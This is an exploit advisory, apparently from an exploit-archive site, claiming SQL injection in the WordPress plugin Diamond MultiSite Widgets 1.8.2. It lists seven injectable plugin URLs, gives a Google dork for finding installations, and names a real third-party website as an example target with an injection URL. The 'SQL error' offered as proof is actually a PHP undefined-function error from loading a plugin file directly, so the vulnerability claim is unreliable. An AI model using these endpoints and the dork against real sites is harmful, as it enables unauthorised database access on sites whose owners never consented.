facebook facebook twitter rss

WordPress Diamond MultiSite Widgets Plugins 1.8.2 SQL Injection

Author: KingSkrupellos , Published: 01-02-2019
####################################################################

# Exploit Title : WordPress Diamond MultiSite Widgets Plugins 1.8.2 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/01/2019
# Vendor Homepage : amegrant.com
# Software Download Link : downloads.wordpress.org/plugin/diamond-multisite-widgets.1.8.2.zip
# Software Information Link : wordpress.org/plugins/diamond-multisite-widgets/
# Software Version : 1.8.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/diamond-multisite-widgets/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Description :
***************

“Diamond MultiSite Widgets” is open source software for WordPress.

####################################################################

# Impact :
***********

* WordPress Diamond MultiSite Widgets Plugins 1.8.2 is prone to an

SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied

data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read,

access or modify data, or exploit latent vulnerabilities in the underlying database.

If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************

/wp-content/plugins/diamond-multisite-widgets/diamond-admin.php?id=[SQL Injection]

/wp-content/plugins/diamond-multisite-widgets/diamond-bloglist.php?id=[SQL Injection]

/wp-content/plugins/diamond-multisite-widgets/diamond-broadcast-posts.php?id=[SQL Injection]

/wp-content/plugins/diamond-multisite-widgets/diamond-multisite-widgets.php?id=[SQL Injection]

/wp-content/plugins/diamond-multisite-widgets/diamond-post-feed.php?id=[SQL Injection]

/wp-content/plugins/diamond-multisite-widgets/diamond-recent-comments.php?id=[SQL Injection]

/wp-content/plugins/diamond-multisite-widgets/diamond-recent-posts.php?id=[SQL Injection]

####################################################################

# Example Vulnerable Site :
*************************

[+] londonsvenskar.com/wp-content/plugins/diamond-multisite-widgets/diamond-admin.php?id=1%27

####################################################################

# SQL Database Error :
*********************

Fatal error: Uncaught Error: Call to undefined function add_action() in /home/londonsv
/public_html/wp-content/plugins/diamond-multisite-widgets/diamond-admin.php:6
Stack trace: #0 /home/londonsv/public_html/wp-content/plugins/diamond-multisite-widgets
/diamond-admin.php(277): DiamondAdmin->DiamondAdmin() #1 {main} thrown in
/home/londonsv/public_html/wp-content/plugins/diamond-multisite-widgets
/diamond-admin.php on line 6

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :